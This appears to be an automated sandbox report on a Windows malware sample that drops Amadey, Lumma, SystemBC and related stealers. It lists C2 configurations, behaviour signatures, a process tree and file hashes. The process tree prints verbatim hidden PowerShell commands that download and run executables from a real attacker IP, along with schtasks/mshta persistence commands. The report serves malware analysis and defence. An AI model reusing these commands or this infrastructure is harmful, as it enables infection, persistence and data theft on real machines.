Analysis

  • max time kernel
    95s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 01:30

General

  • Target

    8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe

  • Size

    2.0MB

  • MD5

    6d2823ba3507697ffa339fcfbbf50bb4

  • SHA1

    dd219c54f269a83ded50f04988316092ecab3d94

  • SHA256

    8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe

  • SHA512

    8264f498304e565f1ef4f1331954fbe8c259d73471b9da8403bda3e9a7fb2dc5ffa794368d0d2b3cace3ddcbbf784b70d4d656ea761777689401935930b7d698

  • SSDEEP

    49152:kTZS63k6rR/cNiJZ+OWje721ML9kj8E5HxdroGZooOnNd6Z:kTZSZ6r1cNQZlWq72iZkjVdrouooONgZ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

amadey

Version

5.21

Botnet

a4d2cd

C2

http://cobolrationumelawrtewarms.com

http://�������� jlgenfekjlfnvtgpegkwr.xyz

Attributes
  • install_dir

    a58456755d

  • install_file

    Gxtuum.exe

  • strings_key

    00fadbeacf092dfd58b48ef4ac68f826

  • url_paths

    /3ofn3jf3e2ljk/index.php

rc4.plain

Extracted

Family

systembc

C2

towerbingobongoboom.com

93.186.202.3

Attributes
  • dns

    5.132.191.104

Extracted

Family

lumma

C2

https://governoagoal.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Poverty Stealer Payload 7 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Poverty Stealer

    Poverty Stealer is a crypto and infostealer written in C++.

  • Povertystealer family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 17 IoCs
  • Renames multiple (1548) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 16 IoCs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 6 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 24 IoCs
  • Identifies Wine through registry keys 2 TTPs 17 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Delays execution with timeout.exe 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe
    "C:\Users\Admin\AppData\Local\Temp\8f28d4d62699c69dca48c1bd99f201f332121adae49047c7547e672e0a6f06fe.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:5784
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4468
      • C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe
        "C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:2016
      • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe
        "C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:5640
      • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe
        "C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:5828
        • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
          "C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Downloads MZ/PE file
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:5160
          • C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe
            "C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Drops file in Windows directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            PID:3960
      • C:\Users\Admin\AppData\Local\Temp\1090673001\c5117d15ea.exe
        "C:\Users\Admin\AppData\Local\Temp\1090673001\c5117d15ea.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4420
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          4⤵
            PID:3792
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1892
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              5⤵
                PID:6088
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
              4⤵
                PID:6100
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                4⤵
                  PID:3640
              • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:3500
                • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe
                  "C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe"
                  4⤵
                    PID:3064
                • C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
                  "C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:728
                  • C:\Users\Admin\AppData\Local\Temp\onefile_728_133846615035900118\continental.exe
                    C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    PID:3864
                • C:\Users\Admin\AppData\Local\Temp\1090975101\82fa88c263.exe
                  "C:\Users\Admin\AppData\Local\Temp\1090975101\82fa88c263.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of SendNotifyMessage
                  PID:3644
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c schtasks /create /tn mF0frmaZIo5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\hrnRjUrRC.hta" /sc minute /mo 25 /ru "Admin" /f
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:3212
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn mF0frmaZIo5 /tr "mshta C:\Users\Admin\AppData\Local\Temp\hrnRjUrRC.hta" /sc minute /mo 25 /ru "Admin" /f
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:2348
                  • C:\Windows\SysWOW64\mshta.exe
                    mshta C:\Users\Admin\AppData\Local\Temp\hrnRjUrRC.hta
                    4⤵
                    • Checks computer location settings
                    • System Location Discovery: System Language Discovery
                    PID:5404
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'O8MO6IFNGJZDB3H26OTZPW0Q03RRKG4U.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
                      5⤵
                      • Blocklisted process makes network request
                      • Command and Scripting Interpreter: PowerShell
                      • Downloads MZ/PE file
                      • System Location Discovery: System Language Discovery
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:5288
                      • C:\Users\Admin\AppData\Local\TempO8MO6IFNGJZDB3H26OTZPW0Q03RRKG4U.EXE
                        "C:\Users\Admin\AppData\Local\TempO8MO6IFNGJZDB3H26OTZPW0Q03RRKG4U.EXE"
                        6⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        • Modifies Windows Defender Real-time Protection settings
                        • Modifies Windows Defender TamperProtection settings
                        • Modifies Windows Defender notification settings
                        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                        • Checks BIOS information in registry
                        • Executes dropped EXE
                        • Identifies Wine through registry keys
                        • Windows security modification
                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2464
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" "
                  3⤵
                  • System Location Discovery: System Language Discovery
                  PID:5680
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1090976021\am_no.cmd" any_word
                    4⤵
                    • System Location Discovery: System Language Discovery
                    PID:1648
                    • C:\Windows\SysWOW64\timeout.exe
                      timeout /t 2
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Delays execution with timeout.exe
                      PID:212
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:4240
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:6048
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:5412
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1584
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                      5⤵
                      • System Location Discovery: System Language Discovery
                      PID:5176
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
                        6⤵
                        • Command and Scripting Interpreter: PowerShell
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:3448
                    • C:\Windows\SysWOW64\schtasks.exe
                      schtasks /create /tn "pL6OimaDoUV" /tr "mshta \"C:\Temp\rOzqb6QSj.hta\"" /sc minute /mo 25 /ru "Admin" /f
                      5⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:4776
                    • C:\Windows\SysWOW64\mshta.exe
                      mshta "C:\Temp\rOzqb6QSj.hta"
                      5⤵
                      • Checks computer location settings
                      • System Location Discovery: System Language Discovery
                      PID:4932
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                        6⤵
                        • Blocklisted process makes network request
                        • Command and Scripting Interpreter: PowerShell
                        • Downloads MZ/PE file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1592
                        • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                          "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                          7⤵
                          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                          • Checks BIOS information in registry
                          • Executes dropped EXE
                          • Identifies Wine through registry keys
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • System Location Discovery: System Language Discovery
                          • Suspicious behavior: EnumeratesProcesses
                          PID:5732
                • C:\Users\Admin\AppData\Local\Temp\1091007001\ab90f56904.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091007001\ab90f56904.exe"
                  3⤵
                  • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                  • Checks BIOS information in registry
                  • Executes dropped EXE
                  • Identifies Wine through registry keys
                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4792
                • C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe"
                  3⤵
                  • Executes dropped EXE
                  PID:4472
                  • C:\Users\Admin\AppData\Local\Temp\onefile_4472_133846615247467954\continental.exe
                    C:\Users\Admin\AppData\Local\Temp\1091008001\HrCoDRP.exe
                    4⤵
                    • Executes dropped EXE
                    • Loads dropped DLL
                    • Drops file in Program Files directory
                    PID:1584
                • C:\Users\Admin\AppData\Local\Temp\1091009001\f126b3976b.exe
                  "C:\Users\Admin\AppData\Local\Temp\1091009001\f126b3976b.exe"
                  3⤵
                  • Executes dropped EXE
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5124
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    4⤵
                      PID:3704
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      4⤵
                        PID:2804
                    • C:\Users\Admin\AppData\Local\Temp\1091010001\8QQOJj9.exe
                      "C:\Users\Admin\AppData\Local\Temp\1091010001\8QQOJj9.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Checks BIOS information in registry
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • System Location Discovery: System Language Discovery
                      PID:3108
                    • C:\Users\Admin\AppData\Local\Temp\1091011001\uXivbut.exe
                      "C:\Users\Admin\AppData\Local\Temp\1091011001\uXivbut.exe"
                      3⤵
                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                      • Executes dropped EXE
                      • Identifies Wine through registry keys
                      • System Location Discovery: System Language Discovery
                      PID:1664
                    • C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe
                      "C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe"
                      3⤵
                        PID:4328
                        • C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091012001\DF9PCFR.exe"
                          4⤵
                            PID:3008
                        • C:\Users\Admin\AppData\Local\Temp\1091013001\ebp51gY.exe
                          "C:\Users\Admin\AppData\Local\Temp\1091013001\ebp51gY.exe"
                          3⤵
                            PID:3660
                          • C:\Users\Admin\AppData\Local\Temp\1091014001\ftS1RPn.exe
                            "C:\Users\Admin\AppData\Local\Temp\1091014001\ftS1RPn.exe"
                            3⤵
                              PID:6016
                            • C:\Users\Admin\AppData\Local\Temp\1091015001\2fb1e26cdf.exe
                              "C:\Users\Admin\AppData\Local\Temp\1091015001\2fb1e26cdf.exe"
                              3⤵
                                PID:4724
                              • C:\Users\Admin\AppData\Local\Temp\1091016001\9903c87eae.exe
                                "C:\Users\Admin\AppData\Local\Temp\1091016001\9903c87eae.exe"
                                3⤵
                                  PID:4480
                                • C:\Users\Admin\AppData\Local\Temp\1091017001\6c97afd1b4.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1091017001\6c97afd1b4.exe"
                                  3⤵
                                    PID:4584
                                  • C:\Users\Admin\AppData\Local\Temp\1091018001\554261e364.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1091018001\554261e364.exe"
                                    3⤵
                                      PID:2788
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                                        4⤵
                                          PID:2432
                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:4192
                                  • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:5500
                                  • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3956
                                  • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:2664
                                  • C:\ProgramData\ncrvt\nkvj.exe
                                    C:\ProgramData\ncrvt\nkvj.exe
                                    1⤵
                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                    • Checks BIOS information in registry
                                    • Executes dropped EXE
                                    • Identifies Wine through registry keys
                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                    • System Location Discovery: System Language Discovery
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:1480
                                  • C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe
                                    1⤵
                                      PID:5004
                                    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
                                      1⤵
                                        PID:6020

                                      Network

                                      MITRE ATT&CK Enterprise v15

                                      Replay Monitor

                                      Loading Replay Monitor...

                                      Downloads

                                      • C:\Users\Admin\AppData\Local\TempO8MO6IFNGJZDB3H26OTZPW0Q03RRKG4U.EXE

                                        Filesize

                                        1.7MB

                                        MD5

                                        59a8cda767eda0232e56289ff859c123

                                        SHA1

                                        721ebb68c1f92b82dcba4935fc5aa60b2632239c

                                        SHA256

                                        3a624049b4250cd8369c0237b9a6cd1f0276cc7f820246ca6a8f64ed17a9ab9a

                                        SHA512

                                        51e1ac757c7c6741f6d7d72927acd08f6ecc4d7fddd2c59da67294891ba976ded0d43b9bc0df70eff3347044f4d10dd38f0e3db92c45eaa946229604ef8901da

                                      • C:\Users\Admin\AppData\Local\Temp\10000160101\archive.exe

                                        Filesize

                                        1.7MB

                                        MD5

                                        e303c7615eec08a0d01e0bee182677e2

                                        SHA1

                                        982abe91e9b478bead9378fee1ea44987d423c53

                                        SHA256

                                        3c464537e7a1baf4feeb085fa55078e8b990374764c6e8ef6b46daea5096626e

                                        SHA512

                                        038d45405fbe913f7c8fb2b68996ded84b55ee40f5fc52258c7b629ba7b0dd60fe2b4609b9b86bfb023acc8843fbefa2bfcbae4edb04b4ee9baa874ed132a42e

                                      • C:\Users\Admin\AppData\Local\Temp\1090507001\ftS1RPn.exe

                                        Filesize

                                        1.7MB

                                        MD5

                                        356ccfc1d038c4bf5aa960b6d18bc9c5

                                        SHA1

                                        3507e3c30b44a318d15b30650744faa1c6c1169b

                                        SHA256

                                        bb745707746aa0b3053489a691ef41fa34f4d70364e9f06d53ee052bfcb24a7f

                                        SHA512

                                        dcf9897335f2992057e1a5ea571a2a98591caf79804a6275aa8bb4f1e9aa934aa2aa89424c5812722436d88bf70c7aea1d8a7843e9ba93d1ca41061253689ebd

                                      • C:\Users\Admin\AppData\Local\Temp\1090525001\8QQOJj9.exe

                                        Filesize

                                        2.8MB

                                        MD5

                                        0658a83d9b5dbbc9dd5bf50c1efbbf1a

                                        SHA1

                                        6ef596985aa7da0170706e9a0a71a9189534f66c

                                        SHA256

                                        567ed55e81371392654e71e8769ff899ef92b1c28d1deb4bbde3219a8872ec00

                                        SHA512

                                        2751bde5b88526f5caddabdbb5ce7214480e1d552b0aeae5888db02d8818a8c2bf71d5e6927cc22097ca62f206b98c6540a019bdb5ca2aa1fcc13260e3546a3c

                                      • C:\Users\Admin\AppData\Local\Temp\1090607001\uXivbut.exe

                                        Filesize

                                        2.1MB

                                        MD5

                                        817caec31605801a67c847f63ce7bb20

                                        SHA1

                                        f023444245b780be58b0c6672a56a7deb8597424

                                        SHA256

                                        162d2eec1e9bbec8f7e160053cf1ea77f080c24df69ac427f474e468f955d1b6

                                        SHA512

                                        ca8abae689f303dab56eeaa8b29b89498c193693563c6fcd2419faf514062865c64b3e9894ec19e923051d458736f1b5efa28234e21ea7acc2ada881aa2fa936

                                      • C:\Users\Admin\AppData\Local\Temp\1090673001\c5117d15ea.exe

                                        Filesize

                                        6.6MB

                                        MD5

                                        6ea2a7f9508369885220226be0fd705d

                                        SHA1

                                        030757e8417498cf85867fe46f59ca6b6cf1498f

                                        SHA256

                                        6f024c0d869fe42a3da00c477b0234fb97dc6d4d576c4e897ddfc062add40478

                                        SHA512

                                        7d1bfeb83555004c930f2680482ab5fc6dde6e37ab067d0303a19b6bb9d2b4d59cc219e6bb4533f424dd5fcedbeff9930698049153b866a7434a0bd08500df3e

                                      • C:\Users\Admin\AppData\Local\Temp\1090769001\DF9PCFR.exe

                                        Filesize

                                        2.1MB

                                        MD5

                                        d59903af15c5257c5e274b297bec5e6d

                                        SHA1

                                        1d84da470c7821a2dbcc9a788e720a4bce32c8c4

                                        SHA256

                                        879785b2c857249d89f97b79ccb4ce25bbb8d1c60f4d003a23fdf1913f40fa2d

                                        SHA512

                                        2ab588a14cd70fa5684d1c82d13ddf48037499b7742fe7af5408044b0776ca4610a9f3780ad2fc302a03d7ce90932219b619fa117e33bfc5f0e860c2663dd42c

                                      • C:\Users\Admin\AppData\Local\Temp\1090961001\HrCoDRP.exe

                                        Filesize

                                        13.6MB

                                        MD5

                                        13ea80f504c5af62897d7f90fea833cf

                                        SHA1

                                        41f38037f1a68ffe501ab9fd69926606bf032766

                                        SHA256

                                        c1dd9242c70478030751af26c10b7e899156ca9c59940bf9b99f8fabe9462cfc

                                        SHA512

                                        90be7f94ea361beb26339d05725b5e952465013a56e86c4c28893d9b1793d6e439ddfef41ced7b1d95c6083ed9a0afee6f5aebcbb9545a360573da2eea03d204

                                      • C:\Users\Admin\AppData\Local\Temp\1090975101\82fa88c263.exe

                                        Filesize

                                        938KB

                                        MD5

                                        02f436abb7c743db0e44b362bb3689ad

                                        SHA1

                                        a07e162092edcf9a796b106d65e8d95806cbb1d9

                                        SHA256

                                        d5d8b6c5961edbca0b89cdbde96f99b56d3a405fa37e44877fd99ff2ed8eba1d

                                        SHA512

                                        8660db8db112f31c43337d06d2051c2789dade9689c1bbacd7a6efffc19e5852a4d1c00287d0e9dc409014f00b972c964b489d4720d9a6ef406e5142003e773e

